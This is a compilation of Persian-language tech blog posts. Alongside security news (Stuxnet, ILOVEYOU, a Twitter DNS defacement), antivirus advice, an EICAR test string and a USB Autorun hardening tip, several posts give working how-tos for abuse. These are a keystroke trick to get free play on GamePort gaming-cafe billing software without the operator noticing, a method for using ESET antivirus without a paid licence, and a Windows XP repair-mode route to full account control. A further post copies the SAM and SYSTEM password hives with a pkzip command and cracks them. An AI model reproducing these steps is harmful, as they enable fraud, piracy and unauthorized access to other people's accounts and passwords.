Computer and Entertainment

در حالی که در چند ماه گذشته اخبار و گزارش های متعددی درباره کرم اینترنتی استاکس نت، منشاء آن و میزان آلودگی سیستم های ایرانی توسط این ویروس اینترنتی منتشر شده است، اخیرا متخصصان امنیت شبکه شرکت بزرگ «کاسپر اسکای»، اعتراف کرده اند که ایران توانسته، سیستم های خود و به ویژه سیستم های مرتبط با تاسیسات هسته ای را از این ویروس مخرب پاک کند.

به گزارش «تابناک»، متخصصان این شرکت تاکید کرده اند، علی رغم اینکه گفته می شود ایران هدف اصلی این ویروس اینترنتی بوده است، هند و اندونزی دو کشوری هستند که بیشتر از ایران تحت تاثیر این ویروس اینترنتی قرار گرفته اند. به گزارش «ثریت پست»، «الک گاستف»، از متخصصان آزمایشگاهی شرکت «کاسپر اسکای» اظهار داشته که، ایرانیان به خوبی توانسته اند، سیستم های خود را از ویروس «استاکس نت»، پاک کنند.

 همچنین بر اساس مقاله ای که «گاستف» در سایت «سکیوریتی لیست»، منتشر کرده است، آمده: بسیاری از افراد معتقدند، ایران هدف این کرم اینترنتی بوده، در حالیکه آنان غافلند که این ویروس حالت ایستایی ندارد و به صورت همه گیر به همه سیستم ها در سرتاسر جهان سرایت خواهد کرد. این کارشناس امنیت شبکه همچنین تاکید کرده، بر همین اساس، هند و اندونزی بیش از ایران از این کرم اینترنتی آسیب دیده اند.

برای دیدن نمودارها و اطلاعات بیشتر به ادامه ی مطلب مراجعه کنید...

روز 4 مه سال 2000،(۱۰ سال و ۱ روز قبل از تاریخ این پست) پاول فلچر مثل همه روزها به دفتر کار خود در شرکت Star Lab رفت ولی آن روز مثل همیشه نبود

پاول ساعت 8:30 به دفتر خود رسید و مثل همیشه اولین کاری که کرد، چک کردن لیست ویروس‌هایی بود که سرویس فیلترینگ Star Lab‌ در طول شب جمع‌آوری می‌کرد.

این لیست که معمولاً هر یک ساعت به‌روزرسانی می‌شد، در یک شب پر از ویروس 40 تا 50 فعالیت خطرناک را نشان می‌داد.

ولی اولین نتایج شب قبل برای پاول بسیار جالب بود چرا که تنها در نیم ساعت بیش از 450 ویروس شناسایی شده‌بودند و تا پایان آن روز هم 13 هزار گزارش فعالیت برنامه‌های مخرب در لیست ویروس یاب شرکت ثبت شده‌بود.

Star Lab تنها شرکتی نبود که آن روز متوجه رشد بسیار سریع ویروس ILOVEYOU‌ شده بود. در سراسر جهان اخبار شرکت‌های امنیت سایبر خبر از به وجود آمدن یک چالش امنیتی بزرگ می‌دادند.

همه چیز از یک کافی نت کوچک در فیلیپین شروع شد وقتی که "اونل دو گازمن" 24 ساله ویروس ILOVEYOU را که تحت پروژه پایانی لیسانس خود طراحی کرده‌بود را منتشر کرد.

عامل کلیدی گسترش سریع این ویروس تکنیک‌های طراحی آن نبود. تنها عامل آن تیتر ایمیلی بود که ویروس به صورت فایلی به نام LOVE_LETTER_FOR_YOU (یک نامه عاشقانه برای شما) به آن پیوست می‌شد.

وقتی گیرنده این فایل را دانلود می‌کرد ویروس به سرعت کد حمله خود را بازخوانی می‌کرد و خود را برای تمام نام‌هایی که در لیست ایمیل کاربر وجود داشت ارسال می‌کرد.

سایت توییتردر نخستین ساعات صبح امروز، ۲۷ آذر ماه، مورد حمله گروهی با عنوان "ارتش سایبر ایرانی" قرار گرفت.

توییتر، یک شبکه اجتماعی اینترنتی است که فضایی برای گذاشتن پیام های متنی در اختیار کاربران خود قرار می دهد.

در طول مدت حمله، کسانی که به سایت توییتر مراجعه می کردند، به صفحه ای هدایت می شدند که در قسمت بالای آن، گروه حمله کننده خود را با عنوان Iranian Cyber Army یا ارتش سایبر ایرانی معرفی کرده بود.

در این صفحه تصویری از پرچمی سبز رنگ دیده می شود که روی آن عبارت "یا حسین" و در کنار آن بخشی از یک آیه قرآن دیده می شود.

در پایین صفحه نیز شعری نوشته شده که با این مصراع آغاز می شود: "اگر فرمان دهد رهبر بتازیم."

توییتر اعلام کرده حمله به سرورهای DNS این شرکت صورت گرفته است. سرورهای DNS مانند دفترچه تلفن عمل می کنند و کامپیوترهایی هستند که کاربران متقاضی یک آدرس اینترنتی خاص (مانند Twitter.com) را به کامپیوتری که سایت مورد تقاضا بر روی آن قرار دارد متصل می کنند.

در نتیجه این حمله بجای آنکه کاربران متقاضی سایت توییتر به سایت اصلی این شرکت متصل شوند، به سایت دیگری که پیام مورد نظر هکرها بر روی آن قرار داشت متصل می شدند.

مسئولین سایت گفته اند که درباره چگونگی حمله تحقیق خواهند کرد.

بلافاصله بعد از این حمله فعالیت سایت توییتر متوقف شد و بعد از حدود یک ساعت دوباره به حالت عادی بازگشت.

انتخابات ایران، موضوع محبوب سال ۲۰۰۹
سایت توییتر از جمله شبکه های اجتماعی بود که در جریان انتخابات اخیر ریاست جمهوری در ایران و وقایع بعد از آن، برای اطلاع رسانی و برقراری ارتباط، مورد توجه معترضان به نتایج انتخابات قرار گرفت.

روز سه شنبه، ۲۴ آذر، توییتر در وبلاگ خود اعلام کرد که کاربران این سایت موضوع انتخابات ایران را به عنوان بحث برانگیزترین موضوع سال ۲۰۰۹ در سایت توییتر انتخاب کرده اند.

برخی حمله به توییتر را واکنشی به استفاده از این سایت توسط معترضین به دولت در ایران قلمداد کرده اند، اما هنوز هویت حمله کنندگان به سایت توییتر مشخص نشده است.

پیش از این نیز "ارتش مجازی ایران" سایت اینترنتی "موج سبز آزادی" را به شیوه ای کاملا مشابه مورد حمله قرار داده بود.

امروز تصمیم گرفتم دو آنتی ویروس رقیب که هر دو هم خوب هستند را مقایسه کنم. آنتی ویروس اول NOD32 از شرکت ESET و آنتی ویروس دوم Avira از شرکت Avira Antivirus است.
دلیل اصلی این کار تلاش کاربران برای خوب جلوه دادن یکی از این آنتی ویروس ها است. البته آنتی ویروسهای بسیار خوب دیگری مانند Kaspersky هم وجود دارد ولی دو آنتی ویروس این مقایسه واقعا رقابت سخت تری دارند.
سیستم تست حداقل سخت افزار مورد نیاز برای نصب هرکدام از این آنتی ویروسها را دارد و از ویندوز Seven استفاده میکند. نسخه ی استفاده شده ی Avira نسخه ی رایگان است و ورژن آن 9.0.0.47 میباشد و همچنین از NOD32 ورژن 4.0.467 که رایگان 30 روزه عرضه شده استفاده کردم. هر دو آنتی ویروس آخرین ورژن هستند و از تاریخ عرضه آپدیت نشده اند.

ادامه ی مطلب را برای انتخاب آنتی ویروس بهتر حتما بخوانید...

خب بعد از مدتی یک روش برای باگ کردن شارژ گیم نت براتون میزارم.
این روش روی GamePort 4.0 آزمایش شده و 100% تضمینی هستش و فکر میکنم روی GamePortهای دیگه هم جواب بده.
به این صورت که توی GamePort طبق روال عادی Username و Password رو بزنید و بعد از زدن پسورد کلید Shift را نگاه دارید و از اعداد بالای کیبرد بزنید 663 و سپس همزمان که Shift را نگاه داشته اید (بدون ول کردن از ابتدا) کلمه ی logoff را تایپ کنید و مجددا 3 بزنید و همینطور که Shift پایین است کلید Enter را بزنید.
حالا هرچقدر شارژ داشته باشید کم نمیشود و میتوانید Free بازی کنید.
نکات مهم:
- تست بر روی Game Port ورژن 4 کاملا عملی است.
- بعد از زدن پسورد تا انتهای عملیات و باز شدن لیست بازیها Shift باید پایین باشد. شما باید وقتی Shift پایین است 663logoff3 را تایپ کنید و Enter بزنید و سپس Shift را رها کنید.
- این کار را فقط وقتی انجام دهید که سرور (اپراتور گیم نت) خودش در بازی است و یا حواسش نیست چون سیستم شما در این حالت خاموش نمایش داده میشود و اگر گیم نت شلوغ باشد اپراتور متوجه خواهد شد.
- این روش را به کسی یاد ندهید (منظور دوستانتان هستند) هر چه بیشتر کسی یاد بگیرد زودتر روش برای اپراتور لو میرود.

روشهای بعدی در ادامه ی مطلب...

در اینترنت و در همین وبلاگ آموزشهای زیادی در مورد بازیابی Folder Option و بازیابی گزینه های مربوط به نمایش فایلهای مخفی وجود دارد.
در این پست یک آموزش جامع در مورد مسائل مربوط به Folder Option و مخصوصا گزینه های نمایش و یا عدم نمایش فایلهای مخفی قرار میدهم. توجه کنید این آموزش کاملا به زبان ساده است و هرکسی میتوانید کارهای گفته شده را انجام دهد.
اولین نکته قبل از شروع این است که سیستم شما اکنون نباید ویروسی باشد. این نکته خیلی مهم است زیرا در غیر اینصورت پس از انجام تمام کارها باز همه چیز به حالت اول باز میگردد.

تمام نکات تا بازیابی کامل بخشهای Folder Option در ادامه ی مطلب...

هكرها روز به روز به روش هاي پيچيده‌تري براي سرقت اطلاعات كاربران روي مي آورند، ولي با رعايت برخي نكات ساده مي‌توان آسيب پذيري سيستم هاي رايانه‌اي را به حداقل رساند. از آنجا كه اين توصيه ها به زبان ساده و توسط يك هكر موفق سابق ارائه شده، مي تواند راهگشاي بسياري از كاربران ساده و عادي باشد. اين مطلب بر اساس مقاله شخصي آقاي كوين ميتنيك تهيه شده است.
وي از جمله هكرهايي است كه خوانندگان ايراني اخبار فناوري اطلاعات هم با نامش آشنا هستند و يكي از جنجالي ترين هكرهاي دنيا محسوب مي‌شود.
وي كه نام مستعار hacker poster boy را براي خودش انتخاب كرده بود، توسط وزارت دادگستري آمريكا به عنوان يكي از مهم‌ترين و تحت تعقيب ترين جنايتكاران رايانه اي تاريخ آمريكا معرفي شد. هك هاي او حتي موضوع دو فيلم سينمايي هم بوده است: Freedom Downtime و Takedown

ميتنيك هك كردن را با سوءاستفاده از سيستم كارتي اتوبوس هاي لس آنجلس آغاز كرد تا به رايگان سوار اتوبوس شود. در ادامه به استراق سمع تلفني پرداخت و سپس به سراغ شبكه هاي رايانه اي ديجيتال و سرقت از نرم افزارها رفت. وي دو سال و نيم از عمرش را صرف هك كردن رايانه ها، سرقت اسرار تجاري شركت ها و افراد، ايجاد اختلال در شبكه هاي تلفني و نفوذ به سيستم ملي هشدار دفاعي در آمريكا نمود. او حتي از هك كردن رايانه هاي هكرهاي همكارش نيز ابايي نداشت.

وي پس از 5 سال زندان كه هشت ماهش را در انفرادي گذراند به فرد مفيدي براي جامعه مبدل شده و به عنوان مشاور امنيتي، نويسنده و سخنران در حال فعاليت است.

حفاظت از خود در محيط اينترنت كار بسيار پرچالشي است. اينترنت يك محيط جهاني است كه اشخاصي بي پروا از آن سوي كره زمين قادر به شناسايي نقاط ضعف رايانه شما و سوءاستفاده از آن هستند. آنها مي توانند از اين نقاط ضعف براي كنترل دسترسي به حساس ترين اسرار شما سواستفاده كنند.
آنها حتي مي توانند از رايانه شما براي ذخيره سازي اطلاعات به سرقت رفته كارت هاي اعتباري يا انواع محتويات نامناسب استفاده كنند. آنها مي توانند به كاربران بي پناه خانگي يا صاحبان مشاغل حمله كنند.
در اين بخش از گزارش، 10 اقدام مهم و اساسي كه براي حفاظت از اطلاعات و منابع رايانه‌اي در برابركاربران بد دنياي سايبر بايد انجام شود، از قول اين هكر سابق به اطلاع مي رسانيم.

البته این توصیه ها بارها تکرار شده است ولی دوباره هم تاکید و تایید میکنیم.

*- نسخه پشتيبان از اطلاعات مهم تهيه كنيد
از همه اطلاعات خود نسخه پشتيبان يا بك آپ تهيه كنيد. شما در برابر حملات مصون نيستيد. سرقت و از دست رفتن اطلاعات براي شما هم ممكن است اتفاق بيفتد. يك كرم يا تروجان نفوذي براي از بين بردن همه اطلاعات شما كافيست.

*- انتخاب كلمه عبور مناسب را سرسري نگيريد
كلمات عبوري انتخاب كنيد كه معقول و منطقي بوده و حدس زدن آنها دشوار باشد. چند عدد را پشت سرهم رديف نكنيد. هميشه كلمات عبور پيش فرض را تغيير دهيد.

*- نرم افزار آنتي ويروس فراموش نشود
از نرم افزارهاي ضدويروس مشهور و معتبر استفاده كنيد و هميشه آنها را به روز كنيد.

*- سيستم عامل رايانه را بروز نگه داريد
سيستم عامل خود را به طور مرتب به روز كرده و تمامي وصله هاي امنيتي عرضه شده توسط شركت طراح هر سيستم عامل را بارگذاري و نصب كنيد.
*- مراقب نرم‌افزارهاي ضعيف امنيتي باشيد
حتي الامكان از استفاده از نرم افزارهاي ضعيف و در معرض حمله خودداري كرده و قابليت هاي خودكار نامطمئن آنها به خصوص در نرم افزارهاي ايميل را از كار بيندازيد.

*- رمزگذاري اطلاعات
از نرم افزارهاي رمزگذاري اطلاعات مانند PGP در زمان ارسال ايميل استفاده كنيد. از اين نرم افزار مي توانيد براي حفاظت از كل هارد ديسك خود نيز استفاده كنيد.

*- نصب نرم‌افزارهاي شناسايي عوامل نفوذي را فراموش نكنيد
حتما نرم افزاري براي شناسايي نرم افزارهاي مخرب جاسوس براي روي رايانه تان نصب كنيد. حتي بهتر است چندين نرم افزار براي اين كار نصب كنيد. برنامه هاي سازگار با ديگر نرم افزارهاي مشابه مانند SpyCop انتخاب هاي ايده آلي هستند.

*- به دور رايانه خود ديوار آتشين بكشيد
از ديوار آتش يا firewall شخصي استفاده كنيد. پيكربندي فايروال خود را به دقت انجام دهيد تا از نفوذ به رايانه شما جلوگيري شود. اين فايروال ها همچنين مانع وارد آمدن خسارت به شبكه ها وسايت هايي كه به آنها متصل هستيد، شده و قادر به تشخيص ماهيت برنامه هايي هستند كه تلاش مي كنند به شبكه اينترنت متصل شوند.

*- حذف برنامه‌هاي دسترسي از راه دور
امكاناتي را بر روي رايانه به آنها احتياج نداريد از كار بيندازيد. به خصوص برنامه هاي كاربردي كه دسترسي به رايانه شما را از راه دور ممكن مي كنند (مانند Remote Desktop، RealVNC و NetBIOS) را حذف يا به اصطلاح disable كنيد.

*- از امنيت شبكه‌هاي رايانه‌اي اطمينان حاصل كنيد
در جهت ايمن سازي شبكه هاي رايانه اي و به خصوص شبكه هاي بي سيم بكوشيد. شبكه هاي واي - فاي خانگي را با كلمه عبوري با حداقل 20 كاراكتر ايمن كنيد. پيكربندي اتصال لپ تاپ خود به شبكه را به گونه اي انجام دهيد كه برقراري ارتباط تنها در حالت Infrastructure اتفاق بيفتد.
هكرها روز به روز به روش هاي پيچيده تري براي سرقت اطلاعات كاربران روي مي آورند، ولي شما با رعايت همين نكات ساده، آسيب پذيري سيستم هاي رايانه‌اي خود را به حداقل خواهيد رساند.

مبحث این پست را با یک پرسش ساده آغاز میکنم. ویروسها با رایانه چه کار میکنند؟
در حقیقت ویروس چرا وحشتناک است و مگر چکار میکند که باید آنتی ویروس نصب کنیم؟
ویروس در اولین مرحله ای که اجرا شود از هر نوعی که باشد خود را تکثیر میکند. ایتدا ممکن است در درایو ویندوز شما کپی شود و یا ممکن است به تمام درایوهای شما انتقال پیدا کند.
اگر ویروس از انواع Sality باشد به فایلهای شما هم میچسبد و آنها را آلوده میکند. بعضی ویروسها اطلاعات شما را مخفی میکنند و فایلهای شما را به شکل کاذب ایجاد میکنند.
اما بزرگترین مشکلی که ویروس برای شما و نه رایانه تان ایجاد میکند این است که دیگر کسی از شما CD و یا Flash نمیگیرد و یا فلش خود را به شما قرضی نمیدهد. هر چه باشد شما ویروسی هستید!!!

اما بحث به همینجا تمام نمیشود. ویروس انواع مختلفی دارد. اگر یک تروجان باشد از پهنای باند اینترنت شما استفاده خواهد کرد. اگر شما ADSL داشته باشید که از این استفاده کمتر متوجه خواهید شد و اطلاعات شما مانند رمزهایتان به سرور مرکزی ویروس ارسال میشود. اگر Dial-Up (اینترنت معمولی تلفنی) باشید به خاطر اشغال پهنای باند سرعت اینترنت شما کم میشود و یا مکرر DC میشوید.
تنظیمات سیستم شما بهم میخورد و هرچه تنظیم کنید فایده ندارد.
بعضی ویروسها پا را فراتر گذاشته اند و کمی هم با شما شوخی میکنند. البته این شوخی ها برای حفظ جان خود ویروس است. مثلا Folder Option و یا Task Manager و حتی Registry Editor را به هر نحوی مسدود میکنند.
کم شدن سرعت سیستم و دیر باز شدن برنامه ها هم که نیازی به گفتن ندارد یکی از نشانه های بارز وجود ویروس است.
ویروسهایی از انواع Blaster سیستم شما را ریستارت خواهند کرد. ویروسهایی هستند که به شما اخطارهای کاذب میدهند و یا صفحات اینترنتی Fake (تقلبی) جلوی شما میگذارند.
اما توجه کنید ویروسهایی داریم که بسیار بی سر و صدا و بدون هیچ کدام از این نشانه ها کار خود را میکنند و خودشان را تکثیر میکنند. پس به سیستم خود اطمینان نداشته باشید.
هرچه از ویروسها بگویم واقعا کم گفته ام. اما گفتن مشکل سودی ندارد پس برای درمان چه کنیم؟ فکر نکنید اینها را گفتم تا تبلیغ یک آنتی ویروس برای شما کنم و معرفی محصول داشته باشیم. هر آنتی ویروسی که دارید فقط تا مدت زمان ساخت آن میتواند ویروسها را شناسایی کند. فرض کنید شما آنتی ویروس هستید و ویروس هم سوالات درسی هستند. (عجب مثالی)
شما وقتی تا سال دوم دبیرستان بیشتر درس نخوانده باشید نمیتوانید سوالات سال سوم را جواب دهید. پس آنتی ویروس هم همینطور است. برای اینکه به سوالات جدیدتر یا همان ویروسهای جدیدتر واکنش نشان دهد باید از اینترنت آپدیت شود.
یک آنتی ویروس خوب باید در عین قدرتمند بودن و سرعت بالا، آپدیتهای کم حجمی هم داشته باشد.
اما برای اینکه زیر قولم هم نزده باشم در ادامه ی مطلب دانلود یک آنتی ویروس و روش به روز رسانی آن را توضیح میدهم.

برای ادامه ی بحث  و دانلود آنتی ویروس به ادامه ی مطلب بروید...

اگر به آنتی ویروس خود اطمینان کافی ندارید و میخواهید به یک وسیلهای آن را آزمایش کنید آیا بهترین راه کپی کردن یک ویروس در هارد نیست؟
آنتی ویروس اگر آن راشناسایی کند پس سالم است.
ولی اگر آن را شناسایی نکرد و به دست خودتان گرفتار ویروس شدید باید چه کنید؟
من به شما راهی ساده را پیشنهاد میکنم.
تمامی آنتی ویروسها یک ویروس مشترک را میشناسند که نام آن Eicar است و به عنوان تست از آن استفاده میکنند.
این به ظاهر ویروس هیچ خطری برای رایانه ندارد و حتی اگر شناسایی هم نشود و روی آن کلیک کنید هم هیچ مشکلی پیش نمی آید.
کافیست Notepad را باز کنید و در آن عبارت زیر را بنویسید:

X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

حالا فایل را با نام Eicar.com ذخیره کنید.
به محض ذخیره کردن فایل باید اخطار مبنی بر شناسایی فایل تست Eicar را دریافت کنید. در این صورت آنتی ویروس شما سالم است و نظارت دارد. در غیر این صورت به فکر یک آنتی ویروس بهتر باشید و یا تنظیمات آنتی ویروس خود را بازبینی کنید.
در عکس زیر نمونه ای از اخطار ESET Smart Security را در برابر فایل تست Eicar میبینید.

توجه داشته باشید که این فایل هیچ آسیبی به رایانه وارد نمیکند و در تمام نرم  افزارهای امنیتی به عنوان تست استفاده میشود.

میبینید که حجم خالی این حافظه 16418287616 بایت است.

طریقه ی ایجاد فایل و توضیحات بیشتر در ادامه ی مطلب...

با عرضه ی نسخه ی 4.0.314 از آنتی ویروس و دیوار آتشین شرکت ESET متاسفانه مهمترین دغدغه ی ما کرک کردن و استفاده ی رایگان از آن است.
در این پست هم من نحوه ی استفاده از آنتی ویروس NOD32 یا ESET Smart Security به صورت دائمی را قرار میدهم تا بتوانید بدون مشکل نرم افزار را آپدیت کنید.
توجه داشته باشید که این نحوه ی کرک برای محصولات Eset Smart Security و Eset NOD32 مشابه است و برای ورژن 3.0.650 تا ورژن 4.0.314 (و شاید ورژنهای بعدی) جواب میدهد.
به طور کلی این روش کرک نیست و شما هیچ تغییری در کار نرم افزار نمیدهید بلکه سریال در نرم افزار شما ثبت میشود تا بتوانید آپدیت کنید.
مهمترین نکته در این روش استفاده ی شما از اینترنت است. یعنی اگر شما حدود 30 روز از اینترنت استفاده نکنید مدت لیسانس تمام میشود و آنتی ویروس شما ضمن هشدار دادن پی در پی دیگر کار نخواهد کرد.
اما اگر هفته ای یک یا چند بار به اینترنت متصل میشوید براحتی آنتی ویروس سریالهای جدید را دریافت و ثبت میکند.
اول از همه باید فایل زیر را با حجم 350 کیلوبایت دانلود کنید.

Nod Login 9.8

نحوه ی استفاده از نرم افزار و لینکهای دانلود آخرین نسخه از آنتی ویروس در ادامه ی مطلب.

با روش زیر میتوانید پسورد یک ورودی ویندوز XP را عوض کنید بدون اینکه پسورد قبلی را داشته باشید.

این ترفند بیشتر برای مواقعی خوب است که پسورد خود را فراموش کرده اید.

سی دی ویندوز را در درایو قرار میدهیم و شروع به ریپیر ویندوز میکنیم و وقتی بعد از ری استارت کردن کامپیوتر وارد مرحله گرافیکی ریپیر شد کلیدshift+f10 را میزنیم.

یک پنجره باز میشود که در آن عبارت NUSRMGR.CPL را تایپ میکنیم حالا پنجره User Management با دسترسی کامل ضاهر میشود.

اگه متوجه نشدین آموزش کامل:
۱. کامپیوتر خودتونو طوری تنظیم کنید که از درایو سی‌دی‌رام بوت بشه.
۲. سی‌دی ویندوز xp رو داخل سی‌دی‌رام گذاشته و کامپیوتر رو بالا بیارید.
۳. وقتی پیغام «کلیدی را برای بوت شدن از سی‌دی بفشارید» را مشاهده کردین، همون کاری رو که گفته انجام بدین.
۴. صفحه‌ی آبی رنگ نصب ویندوز می‌آد و شروع به بارگیری فایل‌هایی از سی‌دی می‌کنه. پس صبر کنید تا این مرحله تموم بشه.
۵. در مرحله‌ی بعد سه انتخاب دارید که باید کلید Enter را فشار دهید.
۶. پس از اندکی صبر صفحه‌ی دیگری می‌آید که باید کلید F8 را بزنید.
۷. سپس برنامه‌ی نصب، صفحه‌ای به شما نشان می‌دهد که حاکی از وجود یک (یا چند) ویندوز نصب‌شده‌ی دیگر در هارد شماست. در صورتیکه چند ویندوز دارید، ویندوز مورد نظر خود را که می‌خواهید پسوردش را پیدا کنید انتخاب نموده و کلید R را بزنید. اگر فقط یک ویندوز دارید، تنها فشردن کلید R کافیست. (این عمل به برنامه می‌فهماند که قصد تعمیر ویندوز را دارید.)
۸. برنامه‌ی نصب وارد مرحله‌ی ریختن فایل‌ها روی سیستم شما می‌شود. مدت زمانی بین ۵ تا ۱۰ دقیقه صبر کنید تا این عمل انجام شده و سیستم خودبخود Restart شود.
۹. اینبار با مشاهده‌ی پیغام «کلیدی را برای بوت شدن از سی‌دی بفشارید» هیچ عملی انجام ندهید تا پس از چند ثانیه ادامه مراحل تعمیر ویندوز در محیط گرافیکی پیگیری شود.
۱۰. به محض ورود به حالت گرافیکی کلید Shift+F10 (کلید Shift به همراه کلید F10) را فشار دهید. این عمل باعث باز شدن پنجره‌ی Command Prompt ویندوز با دسترسی کامل Administrator خواهد شد. احتمال دارد که این پنجره باز نشود، لذا صبر کنید تا در سمت چپ صفحه، جایی که مرحله‌ی فعلی نصب را نشان می‌دهد، عبارت Installing Devices ظاهر شود و سپس مجدداْ امتحان کنید.
۱۱. در صفحه‌ی باز شده عبارت NUSRMGR.CPL را عیناْ تایپ نموده و Enter را بزنید.
۱۲. صفحه‌ی User Management ویندوز با دسترسی کامل ظاهر می‌شود! حال می‌توانید هر کاربری را که می‌خواهید حذف کرده یا پسورد وی را تغییر دهید و یا کاربر جدیدی به سیستم اضافه کنید.
۱۳. پس از انجام تغییرات پنجره‌ها را OK کرده و یا درصورت نداشتن OK (!) آنها را ببندید.
۱۴. صبر کنید تا نصب تمام شود و سیستم Restart شود. سپس تنظیمات خود را به حالت اول برگردانده و از دسترسی کامل به سیستم لذت ببرید!
توجه: هرگز سعی نکنید پس از اعمال تغییرات در کاربران بلافاصله سیستم را Restart یا نصب را کنسل کنید. چرا که باعث می‌شود همه‌ی تغییرات شما از بین رفته و مجدداْ مجبور به پیگیری نصب خواهید شد. راه دیگری هم ندارید.

كلا روش هاي زيادي براي پيدا كردن پسورد ادمين ويندوز هاي NT 2K & XP وجود داره اما من ترجيح مي دم از روش كرك SaM پسورد را بدست بيارم متاسفانه بزرگ ترين ضعف امنيتي مايكروسافت در SaM بر مي گرده به Encrypt اين فايل ها كه با متد 64bit انكريپت و يا بهتره بگم Hash شده و اين به كركرها اجازه رو مي ده كه با يك مقدار دقت حتي بتونه به خوبي هارد ديسك هايي را كه با Format NTFS قالب بندي شده و SaM فايل ها Encode شده اند رو Decode كنند!!
اما ما براي بدست آوردن فايل هاي SaM بايد دو نوع فايل رو در نظر بگيريم:
يكي SaM Registry و ديگري System Registry كه در هنگام عمليات كرك به اين دو فايل مهم كه در مسيرهاي

c:\windows\system32\config\SAM
و
c:\windows\system32\config\system

مي باشندنياز داريم البته اين دو فايل به طور كاملا پيچيده اي Encode شده اند كه اگر ما سيستم رو با ويندوز بالا بياريم نمي توانيم اين دو فايل رو از پوشه هاي بالا بدست بياريم و حتما بايد نياز به سيستم عامل Dos و البته يك برنامه كمپرس گر كه Dos رو پشتيباني كنه داريم من برنامه كمپرس گر PK Zip 2.50 رو پيشنهاد مي كنم !!!
http://garbo.uwasa.fi/pub/pc/arcers/pk250dos.exe
شما اين برنامه رو دريافت كنيد و اجرا كنيد محتويات كمپرس گر UnZip مي شود كليه فايل هاي UnZip شده را در يك فلاپي ديسك قرار دهيد و فلاپي را بيرون بياوريد!

مرحله بعد:
خوب با سيستم Dos بالا مي آيم يا يك Startup ديسك فرقي نمي كنه مهم اين هست كه با Dos سيستم رو بوت كنيم!!
البته دقت كنيد كه اگر با Startup مي خواهيد سيستم رو بالا بياوريد محتويات فايل MsConfig.sys حتما اين موارد رو داشته باشد

DEVICE=himem.sys
dos = high, umb

چك كنيد در ديسكت Startup خود حتما فايل himem.sys باشد اگر نيست مي توانيد از اينجا دريافت كرده و به ديسك Startup اضافه كنيد
Download himem.sys
http://www.techadvice.cc/files/s29k2/w98/Startup-Disk/himem.sys
ما با اين كار ايمان پيدا مي كنيم كه اگر با دسكت Startup سيستم رو بوت مي كنيم حتما RAM بالاتر از 32MB رو پشتيباني مي كنه!!
حال وقتي سيستم رو با Dos بوت كرديد ديسكت كمپرس گر PkZip را داخل سيستم گذاشته و عبارت زير را تايپ كنيد!!

pkzip c:\Crack.zip c:\windows\system32\config\SAM c:\windows\system32\config\system

دقت كنيد بين دو كلمه Sam و C: يك جاي خالي يا Space وارد كنيد بعد Enter كنيد!!
درواقع ما با اين دستور دو فايل مهم SaM Registry و System Registry رو در پوشه هاي بالا استخراج كرده و به صورت فشرده در درايو C با نام Crack.zip ايجاد كرديم!!
البته هنگام عميات اجرا سيستم از ما كمك مي خواهد مه عرض مي كنم!
وقتي دستور بالا رو داديم بعد از يك دقيقه سيستم خطاي command.com مي ده شما بايد ديسكت كمپرس گر را در آورده و ديسكت Startup رو بزنيد و براي ادامه كليدي را بزنيد و سپس تمام !!
فايل Crack.zip در درايو C ايجاد شد!!
حالا سيستم رو Restart مي كنيم و با ويندوز بالا مي آوريم با Winzip فايل مورد نظر يعني Crack.zip را در پوشه اي UnPack مي كنيم حالا نياز به يك كركر قوي
يعني برنامه ProActive Windows Security Explorer داريم شما مي توانيد اين برنامه رو از اينجا دريافت كنيد!!
Download SaM Cracker
http://www.persianhacker.net/downloads/pafiledb.php?action=file&id=3۰

یا

http://www.snapfiles.com/get/pwse.html

خوب اين برنامه رو باز مي كنيم در كادر وسط Registry Files رو تيك مي زنيم و دكمه Dump رو فشار مي دهيم صفحه اي باز شده و از ما محل دو فايل Sam Registry و SystemRegistry به ترتيب در Browse پايين و بالا مي خواهد مسير دو فايل را از پوشه Unpack شده Crack.zip انتخاب كرده و در نهايت Dump رو يك بار ديگر مي زنيم و پس از يك ساعت تمام!!
پسورد به نمايش در مي آيد!!!

نکته: پسوردهای بالای ۸ حرف که تلفیقی از حرف و عدد باشند به هیچ وجه قابل دستیابی نیستند.

من هيچ گونه مسوليتي در قبال اين آموزش را به عهده نمي گيرم...

چند سالی است که بهترین راه برای انتقال ویروس های رایانه ای فلش مموری ها و حافظه های قابل حمل هستند.
تقریبا تمام ویروسها وقتی سیستمی را آلوده کنند؛ ابتدا در آن یک فایل با نام Autorun.ini و سپس فایلی اجرایی که حاوی ویروس است ایجاد میکنند.
فایل Autorun.ini باعث این میشود تا وقتی روی درایو فلش کلیک کنید؛ فایل حاوی ویروس اجرا شود.
از این رو که این دو فایل مخفی هستند پس شما بدون آگاهی ویروس را اجرا میکنید.
حالا در این ترفند قصد دارم روشی به شما معرفی کنم که ویروس نتواند فایل Autorun.ini را ایجاد کند. بنابراین ویروس نمیتواند در فلش کپی شود و در صورتی که فایل مخرب را هم ایجاد کرد قادر به اجرای آن نخواهد بود.
در ویندوز قابلیتی داریم با نام Read only که فایلهای Read Only (فقط خواندنی) حذف شدنی و قابل ویرایش نیستند.
حالا فرض کنید فایلی با نام Autorun.ini در فلش کپی کنیم که Read Only باشد. پس ویروس نمیتواند فایل جدیدی با این نام در فلش کپی کند و نتیجه این میشود که فلش شما تا زمانیکه این فایل را داشته باشد از ویروس و تروجان در امان است.
برای شروع فلش مموری خود را کاملا Format کنید.
حالا Notepad را باز کنید و Save As را بزنید و با نام Autorun.ini در فلش ذخیره کنید.
خوب حالا فایل Autorun.ini ایجاد شد اما ویروس میتواند آن را پاک کرده و فایل مخرب خودش را جانشین آن کند.
برای جلوگیری از این کار در RUN بنویسید CMD تا وارد Command Prompt شوید.
در CMD بنویسید:
Attrib +s +h +r K:\Autorun.ini
K در اینجا همان درایو فلش شماست. ممکن است در سیستم شما نام دیگری داشته باشد.
و سپس Enter بزنید. حالا میبینید که فایل شما مخفی شد.
توضیح فرمان: Attrib فرمانی برای تغییر مشخصه ی فایلها است. +R یعنی افزودن ویژگی Read Only. و +H یعنی افزودن مشخصه ی مخفی بودن و +S یعنی تبدیل فایل به فایل سیستمی که در این صورت فایل حتی با زدن کلید Show Hidden File در Folder Option باز هم قابل رویت نخواهد بود.
از این به بعد فلش شما در برابر ویروسهایی که Autorun.ini ایجاد میکنند ایمن خواهد بود.

و اما حالا که این روش را توضیح دادم خوب است نکته ای در رابطه با Attrib بدانید.
بسیاری از نرم افزارهای مخفی سازی فایلها از همین Attrib استفاده میکنند.
پس شما میتوانید فایلهایتان را براحتی از دید دیگران مخفی کنید.
به عنوان مثال شما در مسیر زیر تعدادی فایل عکس دارید.
